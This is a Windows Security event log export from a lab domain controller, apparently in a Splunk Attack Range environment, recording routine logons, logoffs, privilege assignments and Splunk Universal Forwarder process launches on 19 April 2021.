Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264606
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB2E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264621
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1568
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264620
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1930
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264622
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ba8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264624
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xaa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264623
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264625
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x53c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:24:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264626
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83C204
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:33 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264627
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-DC-209$
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x833212
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264630
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83F5D8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264629
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x83F5D8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53518
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:24:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264628
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83F5D8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:25:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264631
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264633
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264632
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1098
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264634
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1370
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264636
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264635
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264637
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:25:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264638
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x83BB2E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264641
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x842FC9
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264640
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x842FC9
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53531
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:25:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264639
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x842FC9
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:26:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264642
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x344
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264644
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
